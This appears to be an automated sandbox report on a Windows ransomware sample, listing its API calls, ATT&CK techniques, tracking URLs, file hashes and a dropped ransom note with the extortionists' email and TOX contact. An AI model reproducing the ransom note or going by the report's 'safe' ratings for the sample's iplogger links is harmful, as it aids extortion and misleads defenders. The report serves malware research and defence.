Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_00674EEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00674EEB

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\win_gui.exe.exe | Message posted: Message id: QUERYENDSESSION
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005C6CB5 GetComputerNameW,lstrcatW,lstrlenW,GetUserNameW,LookupAccountNameW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,BuildTrusteeWithSidW,InitializeCriticalSection,0_2_005C6CB5
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005C9E62 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_005C9E62
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005D27E4 cpuid 0_2_005D27E4
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: GetLocaleInfoW,MessageBoxA,ExitProcess,0_2_005CABD1
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Program Files (x86)\COMEBaDYJEZtPnCPYFIRcLwBAtysmSXYTUEGiPYFhoKwjEtYOPojCACXlzyCfS\FsUpAxNjedWpMOXaF.exe VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Users\user\Desktop\win_gui.exe.exe VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Queries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005D23FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005D23FC
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005C6CB5 GetComputerNameW,lstrcatW,lstrlenW,GetUserNameW,LookupAccountNameW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetSecurityDescriptorOwner,BuildTrusteeWithSidW,InitializeCriticalSection,0_2_005C6CB5
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005C9EBC GetVersionExW,0_2_005C9EBC
Source: C:\Users\user\Desktop\win_gui.exe.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\win_gui.exe.exe | Code function: 0_2_005C618D GlobalAlloc,WSASocketW,GlobalFree,bind,closesocket,CreateIoCompletionPort,0_2_005C618D
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 21 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 21 Input Capture | 1 System Time Discovery | 2 Taint Shared Content | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 2 Data Encrypted for Impact
Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Masquerading | LSA Secrets | 1 Network Share Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Query Registry | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 31 Security Software Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 Process Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 Application Window Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 System Owner/User Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | Embedded Payloads | Keylogging | 1 System Network Configuration Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking

Source | Detection | Scanner | Label | Link
win_gui.exe.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://iplogger.co/fests | 0% | Avira URL Cloud | safe |
https://iplogger.co/155qJ4.torrent5 | 0% | Avira URL Cloud | safe |
https://iplogger.co/155qJ4.torrente | 0% | Avira URL Cloud | safe |
https://iplogger.co/ram | 0% | Avira URL Cloud | safe |
https://iplogger.co/155qJ4.torrent; | 0% | Avira URL Cloud | safe |
https://iplogger.co/ | 0% | Avira URL Cloud | safe |
https://iplogger.co/155qJ4.torrentgb | 0% | Avira URL Cloud | safe |
https://iplogger.co/155qJ4.torrent9 | 0% | Avira URL Cloud | safe |
https://iplogger.co/ces | 0% | Avira URL Cloud | safe |
https://iplogger.co/155qJ4.torrentG | 0% | Avira URL Cloud | safe |
http://utox.org | 0% | Avira URL Cloud | safe |
https://iplogger.co/155qJ4.torrent | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
iplogger.co | 172.67.167.249 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://iplogger.co/155qJ4.torrent | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://iplogger.co/ces | win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.co/155qJ4.torrent9 | win_gui.exe.exe, 00000000.00000003.2450063743.000000000163A000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000003.2438730506.000000000162D000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.000000000163D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.openssl.org/docs/faq.html | win_gui.exe.exe | false | | high
https://iplogger.co/155qJ4.torrent; | win_gui.exe.exe, 00000000.00000002.4487317189.00000000082CB000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oracle.com/hotspot/jdk/ | jfr.jar.0.dr | false | | high
http://www.oracle.com/hotspot/jfr-info/ | jfr.jar.0.dr | false | | high
https://iplogger.co/155qJ4.torrente | win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481037911.00000000012FB000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://javax.xml.transform.sax.SAXTransformerFactory/feature | jfr.jar.0.dr | false | | high
https://iplogger.co/155qJ4.torrentG | win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.co/155qJ4.torrentgb | win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.co/fests | win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.co/ram | win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oracle.com/hotspot/jvm/ | jfr.jar.0.dr | false | | high
https://iplogger.co/ | win_gui.exe.exe, 00000000.00000002.4484132134.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.0000000001651000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4482295362.0000000005530000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.co/155qJ4.torrent5 | win_gui.exe.exe, 00000000.00000002.4482350429.000000000562D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://utox.org | win_gui.exe.exe, 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp, README.TXT48.0.dr, README.TXT271.0.dr, README.TXT262.0.dr, README.TXT404.0.dr, README.TXT582.0.dr, README.TXT629.0.dr, README.TXT541.0.dr, README.TXT574.0.dr, README.TXT555.0.dr, README.TXT374.0.dr, README.TXT586.0.dr, README.TXT243.0.dr, README.TXT382.0.dr, README.TXT200.0.dr, README.TXT669.0.dr, README.TXT391.0.dr, README.TXT418.0.dr, README.TXT350.0.dr, README.TXT127.0.dr, README.TXT333.0.dr | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.67.167.249 | iplogger.co | United States | | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567651
Start date and time: 2024-12-03 17:49:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: win_gui.exe.exe
(renamed file extension from infected to exe)
Original Sample Name: win_gui.exe.infected
Detection: MAL
Classification: mal92.rans.spre.expl.evad.winEXE@1/1341@1/100
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 45
• Number of non-executed functions: 184
Cookbook Comments:
• Override analysis time to 240s for sample files taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 217.20.59.35, 192.229.221.95
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: win_gui.exe.exe
Time | Type | Description
11:51:55 | API Interceptor | 27x Sleep call for process: win_gui.exe.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.167.249 | file.exe | malicious | Unknown
172.67.167.249 | file.exe | malicious | LummaC Stealer
172.67.167.249 | sus.ps1 | malicious | LummaC
172.67.167.249 | ofsetvideofre.click.ps1 | malicious | LummaC
172.67.167.249 | 4h1Zc12ZBe.exe | malicious | Stealc
172.67.167.249 | dlcdkJcbbV.exe | malicious | LummaC, RedLine
172.67.167.249 | 1Vkf7silOj.exe | malicious | LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc
172.67.167.249 | hsRju5CPK2.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT
172.67.167.249 | https://prezi.com/i/view/0dF0780HKO9RqC8umFaJ | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
iplogger.co | file.exe | malicious | Unknown | 104.21.82.93
iplogger.co | file.exe | malicious | LummaC Stealer | 172.67.167.249
iplogger.co | sus.ps1 | malicious | LummaC | 172.67.167.249
iplogger.co | cW5i0RdQ4L.exe | malicious | Unknown | 104.21.76.57
iplogger.co | cW5i0RdQ4L.exe | malicious | Unknown | 104.21.76.57
iplogger.co | Activator by URKE v2.5.exe | malicious | LummaC | 172.67.188.178
iplogger.co | SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe | malicious | Unknown | 104.21.76.57
iplogger.co | file.exe | malicious | DarkTortilla, PureLog Stealer | 104.21.76.57
iplogger.co | file.exe | malicious | DarkTortilla | 104.21.76.57
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Employee_Bonus_Notlce.pdf | malicious | Unknown | 172.67.69.226
CLOUDFLARENETUS | Employee_Important_Message.pdf | malicious | HTMLPhisher | 104.26.12.205
CLOUDFLARENETUS | fes.msi | malicious | BruteRatel, Latrodectus | 104.21.68.89
CLOUDFLARENETUS | #Ud83d#Ude0e.pdf | malicious | Porn Scam | 172.67.198.207
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
CLOUDFLARENETUS | Document-v15-51-07.js | malicious | Unknown | 172.67.146.191
CLOUDFLARENETUS | hnskldjf230.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
CLOUDFLARENETUS | Document-v15-51-07.js | malicious | Unknown | 172.67.146.191
CLOUDFLARENETUS | 3GloGaDtsG.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.6
CLOUDFLARENETUS | #Ud83d#Ude0e.pdf | malicious | Porn Scam | 104.21.13.77
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | MLETdJL8JJ.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | eAvqHiIsgR.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | tebWUNHW7S.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | kvk78zDZTu.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | RAZTZoDeHA.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | eAvqHiIsgR.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | kvk78zDZTu.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | w0nz47MlOe.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | w0nz47MlOe.exe | malicious | GuLoader | 172.67.167.249
37f463bf4616ecd445d4a1937da06e19 | gJUrBC17Wh.exe | malicious | GuLoader | 172.67.167.249
No context
Process: C:\Users\user\Desktop\win_gui.exe.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1440
Entropy (8bit): 4.9726392336966
Encrypted: false
SSDEEP: 24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
MD5: 26BC5681FEB410FE72232CBC4B8ADB91
SHA1: 6DAAA573AF83C46428EB318F6EB041A9E177202C
SHA-256: 1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
SHA-512: BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
Malicious: false
Reputation: low
Preview: YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Reputation:low
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13693
                                Entropy (8bit):7.9877505603833185
                                Encrypted:false
                                SSDEEP:384:SercTtjIQcdsuMC6vXsxlKr1oTrvtw+VOc:zcBIfdsVCeXsxEgrVwY
                                MD5:F14CBEA46D6EE259A53CD01CD3594CF6
                                SHA1:DDA7F88631D014AAF056281B021FC5F581C21F69
                                SHA-256:FD34EADC55EE6BF17F643630EDDCD664DF6BB4976C10846B53CDD2FD0E51E4F7
                                SHA-512:9171955AF20678F411FA77E2693C0A6ED8989A39B9368BC7AFB6A6A55562951E716D2EEB95F5FB74BAE7B1601EFAD615BFA43EEC889331455F1D8952CB95CE07
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):234696
                                Entropy (8bit):7.999142776172254
                                Encrypted:true
                                SSDEEP:6144:3Au9tuRx/tsmgk2HUEpjUtwha5aJYYqEbCnnAa4eZK:p9twa3Na0a9rEFJ
                                MD5:3D54BAAFFE03A2520638138A31FD15D5
                                SHA1:7755AFD7534FCF3BB4D6E24FD3DD918EB74612FB
                                SHA-256:4D5C45754D2D4597224D4B9BE101FC79391613106B74573A51D1E9DFD413CB0D
                                SHA-512:4C5603D93FDF32F3CD67769E9BD7A131552E99078A9BB48FEFBE333BD1D70E8C3F22A4D1DC0EB827A1B261C85575038DC43B8F25C44D08356013B260B5E2FC0E
                                Malicious:true
                                Reputation:low
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):176840
                                Entropy (8bit):7.998808341285109
                                Encrypted:true
                                SSDEEP:3072:zvDTnF6mZ+UDhcs7V/8iuDGPHbfCp4y3NdupnCl9Zy7sVUw4dkf94Gld1b:jnF3Hcs7sDYHzCp4ud9MsVUwik3ld1b
                                MD5:E44D43CEB63E1F03FE7F18FBBDE1FDD2
                                SHA1:6921D4041F44C809055E4CCB8CC0C076DFEF0BDB
                                SHA-256:FA3549D98606DFB67A754CD01A1774CA440F3505FED75EB32EDA6DC7FA48402E
                                SHA-512:5A280050DAFF007AE7E97BB1D2A1AE055E7843E6679B8E20EDE926F28EF0ED99C5D03AC2365AA61CA6C075BECF8D56568036C3FD03464AA1251811B6D85EBCAB
                                Malicious:true
                                Reputation:low
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):196296
                                Entropy (8bit):7.999106659430505
                                Encrypted:true
                                SSDEEP:3072:NtVyf4xheJMsZ2XXuOJvpP3niB2yqCXSudih2yLD2GC4ARPPLr6FOCWElPq:NtIfM0usZSpvnW2yX7pyLiGC4W3H
                                MD5:734F3D3B91AE128D3AFCB81137439574
                                SHA1:BC80B7F1BA234A088ADACAD954A37BA3CE6FA116
                                SHA-256:AED4167B3B0E8FEDE552486F5B5F0E7453E602B652F5E24DF7408DA31BB7E8E5
                                SHA-512:F64DC6C6BFA9694EB42BEE6BB2F69B03C66CB1A10D5043A556AAE952C7D8E31146C3B2185552CA747583C36D3B751EDB1B843A078F6C641DAC84165846FCFAF3
                                Malicious:true
                                Reputation:low
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):812
                                Entropy (8bit):7.710767094402821
                                Encrypted:false
                                SSDEEP:24:0ZsfyGpZ5z/wpDyYPGTNj0hOHAVMJg6WXs93K4:Q+9pT/WyYu+MAVMJg6T5
                                MD5:37E6C43602D8760CFC977C202FE58AFE
                                SHA1:04A7F866ED4520399C10B47B4AD3D6A68EDB3FDE
                                SHA-256:0FD783BE16F4983A34B94D41EA81B28110555C9EF79426D63D4E35A7C8EA5724
                                SHA-512:1186C82F75E22D8628761055D67E6F00709CA28D36EBFFC6075E0386D3654F2A4CACD3AAA591C73CFB16898C2C5EE96F48341504EFE7567197B8DBA6C9709B26
                                Malicious:false
                                Reputation:low
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7186249
                                Entropy (8bit):7.995708840734016
                                Encrypted:true
                                SSDEEP:196608:b8aNYqqNaXN0wMHZVCqo/ugQ9dz5COj1fNAgBMkKi:bJpqlzH3M/uNDz5bWgBAi
                                MD5:8EBCA2DF5CB8AFF13B44E6544BD795D0
                                SHA1:007278F60651216E5CD151D621F897A965199C2D
                                SHA-256:44BC34E80A6BD4EB53FB1BC86456096BCDE00D28E202A8DE27D877036409BBB0
                                SHA-512:4EA97C3C5DDAB1FA6CC2FA82090EB4C0B7E23ACA5E422FAB9AAB17936BB4FAC25D995241E9F5657A27E8B14EFEAEF9E4FD9AEC73C824695FC0D7C2DBCF365AF8
                                Malicious:true
                                Reputation:low
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125112
                                Entropy (8bit):7.9985858202799855
                                Encrypted:true
                                SSDEEP:3072:JWPZVHAMB6KphLPMsyKbwlqLHfZS8eKvjmqEi5XvNnUy:0PZZA+jpV1bl/ZSxKvjmW5fNv
                                MD5:97DEEC4E633419F9D560AB655B76E0A1
                                SHA1:18B3F7535A49CE230E8A1F6AD301330249BDDFED
                                SHA-256:A59915E7A6C88250D8E991F2B48865F1677B8800CF3050A88C5880310267FBE4
                                SHA-512:5254096FF248ACE2C6CA9BA0A8901835CF3C8CEDDE250EB29E88077037EF5E761001D8BB3FF8E701AF79F3EA00D1A7C2CC8E47C99BAC4EB539057794F5AC2FFD
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1072312
                                Entropy (8bit):7.042915404968756
                                Encrypted:false
                                SSDEEP:24576:ZLsWUon6Rb6qu1PyC+NRLtpScpzbtT7pyOolKLLfHB5O2cxaNIdU:+on6AqSPyC+NltpScpzbtvpJoMXD7kaN
                                MD5:9A40E1B6F8BC2EF3DCDE954B92ECACFF
                                SHA1:9CFAEEFB9ED9D5720DA7B0B109D2C8F003087E5D
                                SHA-256:8747E687691FBD950D400B6659AA27B6D746F1A93DD22701895ED05975B102A1
                                SHA-512:809F6301E35C4646C07BCBD60E5C2DE91BC7346EA02B18A18827F3A140FCA67A31F83C2C61ED8FD005BC6ADA5F196CB7EFD6232866CCD4F2EE7E72601F54AAEE
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):200994
                                Entropy (8bit):7.9990215482457305
                                Encrypted:true
                                SSDEEP:6144:vKBCZ3b8J9LYK2hI4oKsqoNEivjx9OYq0kuGcn:vQCru9T2fsqkEiVsZHcn
                                MD5:2AD5DA53E4EC1CA88D321888E1C1DF26
                                SHA1:09C82F2431F6FBD58E0A57AB7BCE6FF23F0E6190
                                SHA-256:131F36DB31E41D4B6FF945E1E020A0A8A55CAC7A41B6A0DC4EB34F058C08BE7E
                                SHA-512:FCFEABB6A09364B0C734D147A65E638E303CAA440201E9FAA742EF5D6699CA0B2DA5CC959AF1644EF1F27C9FBE77EEBC2DFE4F580C4976FD9B0F08B9028C2329
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):34062
                                Entropy (8bit):7.994227657485516
                                Encrypted:true
                                SSDEEP:768:gg6BwT9uc8XkBVwgWhTOXBGSfP0+R3zf/SzjruzRAJfb2T3Hws:8Bwl8VxhToPBDSzPyRk23t
                                MD5:194638EF54FED96EFAE023E0CF09B9DD
                                SHA1:670EBA95FF1B27FF91DEE4C4AE205F0A79ACA31A
                                SHA-256:78778C65D08827B94F583CA11A4C7383C65D2499C4BFB6C40E9FF0A0EA926271
